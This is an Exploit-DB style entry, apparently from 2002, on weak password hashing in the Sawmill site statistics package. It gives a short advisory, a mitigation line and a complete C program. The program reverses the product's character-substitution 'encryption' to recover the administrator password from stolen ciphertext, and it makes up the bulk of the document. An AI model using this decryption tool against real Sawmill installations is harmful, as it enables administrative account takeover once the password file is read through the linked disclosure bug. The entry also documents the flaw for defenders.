Decrypt password for Sawmill admin account

vendor:

Sawmill

by:

Larry W. Cashdollar

2.1

CVSS

LOW

Weak Hash Function

327

CWE

Product Name: Sawmill

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unix, Windows and Mac OS

2002

Decrypt password for Sawmill admin account

Sawmill is a site statistics package for Unix, Windows and Mac OS. Passwords are encrypted using a weak hash function. This combined with the file disclosure vulnerability in Sawmill (bid = 1402) could allow an attacker to read the contents of sawmill's password file, then decrypt the password and gain Sawmill administrative capabilities.

Mitigation:

Ensure that passwords are encrypted using a strong hash function.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/1403/info

Sawmill is a site statistics package for Unix, Windows and Mac OS. Passwords are encrypted using a weak hash function. This combined with the file disclosure vulnerability in Sawmill (bid = 1402) could allow an attacker to read the contents of sawmill's password file, then decrypt the password and gain Sawmill administrative capabilities. 

/*Decrypt password for Sawmill admin account.

Larry W. Cashdollar
lwc@vapid.betteros.org
http://vapid.betteros.org
usage ./decrypt cyphertext

*/

#include <stdio.h>



char *alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+~<>?:\"{}|";
char *encode="=GeKMNQS~TfUVWXY[abcygimrs\"#$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";

int
main (int argc, char **argv)
{

  int x, y;
  char cypher[128];

  strncpy (cypher, argv[1], 128);

  for (x = 0; x < strlen (cypher); x++)
    {

      for (y = 0; y < strlen (encode); y++)
        if (cypher[x] == encode[y])
          printf ("%c", alpha[y]);

    }

printf("\n\"+\" could also be a space [ ]\n");

}